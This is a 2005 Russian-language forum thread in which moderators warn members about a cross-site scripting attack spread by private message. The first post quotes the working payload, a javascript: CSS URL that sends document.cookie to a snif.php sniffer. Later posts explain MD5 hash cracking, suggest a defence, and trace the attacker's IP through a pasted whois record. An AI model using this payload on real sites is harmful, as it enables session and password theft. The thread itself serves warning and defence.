Если вам опера выдает в постах или в любой точке форума что-то типа:
` style=`background:url(javaSCript:document.images[1].src="http://runiverse.net/forum/images/avatars/xxx/snif.php?"+document.cookie)`
Или по ПМ, или в любом виде - немедленно сообщите об этом Айвану, ДБКолу или любому супермодератору, чтобы автор этих сообшений был забанен.
Этот скрипт опасен. Он похищает ваши пароли.
Полная версия: !ВНИМАНИЕ ОПАCНОСТЬ ХИЩЕНИЯ!
Был замечен wasd.
| QUOTE (Leon PRO @ Oct 25 2005, 18:35) |
| Если вам опера |
очередная дырь оперы? или форума?
Так-с-с...
1.Ошибка оперы или форума?
2. Это может быть в любом посту и стпром в том числе?
1.Ошибка оперы или форума?
2. Это может быть в любом посту и стпром в том числе?
мне пришло на пм. Я добанил его до 100 (Леон уже 20 поставил до этого) и на всяк сменил пасс.
В других браузерах скрипт просто ворует у вас пароли и все...
А Опера блокирует. И видно кусочек оного.
А Опера блокирует. И видно кусочек оного.
Говорит о крутости Оперы и о дыре в форуме. Что за ник то был у атакующего?
У нормальный людей JS is disabled 
| QUOTE (RiPPeR @ Oct 25 2005, 19:53) |
| У нормальный людей |
... свеженький фф
| QUOTE (Clement Astilon @ Oct 25 2005, 19:42) |
| В других браузерах скрипт просто ворует у вас пароли и все |
а мне кусок пришел. Правда скрипты отключены.
Не знаю,не знаю..в ИЕ тоже виден кусок.
А если FireFox? Что ж мне теперь - все пароли менять?.. 
Кто выпустил скрипт на волю? Ворует он пароли вообще их сохраненных - или только для форума?
Кто выпустил скрипт на волю? Ворует он пароли вообще их сохраненных - или только для форума?
Скрипт ворует кукисы, один из кукисов называется pass_hash
В этом куке хранится MD5 от пароля (хэш пароля). Вроде ничего, но только существуют средства, как подобрать пароль, чтобы MD5 совпал. То есть, пароль не обязательно должен совпадать с вашим, достаточно, что результат функции md5() будет одинаковым и для вашего пароля, и для свежеподобранного.
Защита от этого зловредного скриптика проста, как валенок: надо выйти из форума (отлогиниться), затем опять загогиниться, но на форме логина НЕ СТАВИТЬ ГАЛКУ "запомнить меня". И все. Галка не стоит - захэшированный пароль в кукисах не валяется - и воруйте, хоть обворуйтесь. Недостаток тут только один: при каждом посещении форума надо авторизироваться, но с моей личной точки зрения (ИМХО) это скорее достоинство...
Добавлено в 01:55
Добавлю...
Кстати, ворует оно только кукисы того хоста (домена), где было запущено. То есть кукисы для, скажем, mail.ru на wrg.ru получить будет невозможно. Аналогично и обратное. Это особенности кукисной системы и честь и хвала Netscape, что в своё время с умом сделали эту технологию.
Добавлено в 02:09
В этом куке хранится MD5 от пароля (хэш пароля). Вроде ничего, но только существуют средства, как подобрать пароль, чтобы MD5 совпал. То есть, пароль не обязательно должен совпадать с вашим, достаточно, что результат функции md5() будет одинаковым и для вашего пароля, и для свежеподобранного.
Защита от этого зловредного скриптика проста, как валенок: надо выйти из форума (отлогиниться), затем опять загогиниться, но на форме логина НЕ СТАВИТЬ ГАЛКУ "запомнить меня". И все. Галка не стоит - захэшированный пароль в кукисах не валяется - и воруйте, хоть обворуйтесь. Недостаток тут только один: при каждом посещении форума надо авторизироваться, но с моей личной точки зрения (ИМХО) это скорее достоинство...
Добавлено в 01:55
Добавлю...
Кстати, ворует оно только кукисы того хоста (домена), где было запущено. То есть кукисы для, скажем, mail.ru на wrg.ru получить будет невозможно. Аналогично и обратное. Это особенности кукисной системы и честь и хвала Netscape, что в своё время с умом сделали эту технологию.
Добавлено в 02:09
| QUOTE (maximal_up @ Oct 25 2005, 19:45) |
| Говорит о крутости Оперы и о дыре в форуме. |
Это говорит об убогости Оперы и кривости рук писателей форума (на наше счастье, в IPB2 уже хранятся произвольно хэшированные пароли)
А по поводу Оперы: document.cookie описан в стандарте w3c, является нормальной штатной фишкой и "на ура" поддерживается IE и Mozilla/Firefox/Konqueror. Опера, блин, как всегда "впереди планеты всей".
А то, что document.cookie воспользовались в таких целях - так это и кухонным ножом можно мирно хлеб нарезать, а можно и зарезать кого...
Дырка для закрытия глюка с несанкционированным получением паролей пользователей форума уже давно разжована в инете... Советую поискать и исправить код.
| CODE |
wasd 219.149.233.179 guru@komifree.ru |
Я еще вчера глядя на стрейф-ник думал мож квакер какой
Интуиция не подвела. Но не стал банить...Добавлено в [mergetime]1130331840[/mergetime]
| CODE |
Отправлено: xss Lex Oct 25 2005, 17:04 Прочитанные письма Отправлено: xss DBColl Oct 25 2005, 17:04 Прочитанные письма Отправлено: xss Salivin Oct 25 2005, 17:04 Прочитанные письма Отправлено: xss Leon PRO Oct 25 2005, 17:04 Прочитанные письма Отправлено: XSS Aiwan Oct 25 2005, 17:03 |
Добавлено в [mergetime]1130332325[/mergetime]
| CODE |
Request: 219.149.233.179 connected to whois.arin.net [192.149.252.44:43] ... connected to whois.apnic.net [202.12.29.13:43] ... % [whois.apnic.net node-1] % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html inetnum: 219.149.233.176 - 219.149.233.179 netname: JL-FUAO-COMPANY descr: JILIN-FUAO-COMPANY country: CN admin-c: CH123-AP tech-c: CNO3-AP status: ASSIGNED NON-PORTABLE mnt-by: MAINT-CHINATELECOM-JL changed: songlianjun@jltele.com 20040223 source: APNIC person: CHINATELECOM-JL Hostmaster nic-hdl: CH123-AP e-mail: songlianjun@jltele.com address: No.518,Changchun Street Changchun city,Jilin province,130042 phone: +86-431-5880020 fax-no: +86-431-5881234 country: CN changed: songlianjun@jltele.com 20041130 mnt-by: MAINT-CHINANET-JL source: APNIC person: CHINATELECOM-JL Network Operations nic-hdl: CNO3-AP e-mail: niuhui@jltele.com address: No.518,Changchun Street Changchun city,Jilin province,130042 phone: +86-431-5880036 fax-no: +86-431-5881234 country: CN changed: songlianjun@jltele.com 20041202 mnt-by: MAINT-CHINANET-JL source: APNIC |
Добавлено в [mergetime]1130332416[/mergetime]
Картинка отседова...
| CODE |
http://runiverse.net/forum/ |
| QUOTE (Aiwan @ Oct 26 2005, 16:49) |
| Отправлено: xss Lex Oct 25 2005, 17:04 Прочитанные письма Отправлено: xss DBColl Oct 25 2005, 17:04 Прочитанные письма Отправлено: xss Salivin Oct 25 2005, 17:04 Прочитанные письма Отправлено: xss Leon PRO Oct 25 2005, 17:04 Прочитанные письма Отправлено: XSS Aiwan Oct 25 2005, 17:03 |
короче чел хотел акки супермодеров и админов.
Айв, судя по всем это прокси. Кому бы из Китая наши пароли понадобились? Но прокси довольно легко пробиваются. Если хочешь могу народ поспрашивать как - получим настоящий ай-пи.
А разве через посты ай-пи не прбить? Я не думаю, что он его как-то изменял или скрывал. Тем-более, что интернет карт ай-пи меняется каждый раз... Валеско, идея хорошая, но не спасёт.
| QUOTE |
| Я не думаю, что он его как-то изменял или скрывал. Тем-более, что интернет карт ай-пи меняется каждый раз... Валеско, идея хорошая, но не спасёт. |
Скрывал. Явно через прокси. Ну не верю я что какой-то китаец тут письма рассылал! А бота создавать и запускать через форумы... ну не знаю - маловероятно. Скорее кто-то просто юзает прокси. Зная его ай-пи, пусть с разных карточек, можно по настоящему провайдеру вычислить город где живет. Народу нам "сочувствующего" не так много, чтобы потом гадать, а то что это левак я сомневаюсь. Кому мы нужны?
| QUOTE (maximal_up @ Oct 26 2005, 18:19) |
| А разве через посты ай-пи не прбить? |
пробить. Читай пост Айва. Тока если чел юзает Высоко Анонимный Прокси сервер, то дальше этого сервака отследить сложно.
| QUOTE (maximal_up @ Oct 26 2005, 18:19) |
| Тем-более, что интернет карт ай-пи меняется каждый |
а если у него выделенка? или локалка со статичным ИП на выходе?
Заплатки нет пока. так что не сохраняйте пасс свой. И если увидите такое письмо, сразу мне имя писаря в пм...
Постов у него нет. Так что ипи тока такой.
Постов у него нет. Так что ипи тока такой.
к слову...
http://droaam.nm.ru/images/hak-lam.jpg
http://droaam.nm.ru/images/hak-lam.jpg
| QUOTE (Lex @ Oct 26 2005, 19:05) |
| а если у него выделенка? или локалка со статичным ИП на выходе? |
Так делать глуповато. Намного легче воспользоваться чем-то временным. К примеру купить карту или послать письмо из того-же интернет клуба.
| QUOTE (Aiwan @ Oct 26 2005, 19:07) |
| Постов у него нет. Так что ипи тока такой. |
А в сообщении на ПМ ай-пи не пишется? Ведь это вроде можно сделать...
Это текстовая версия — только основной контент. Для просмотра полной версии этой страницы, пожалуйста, нажмите сюда.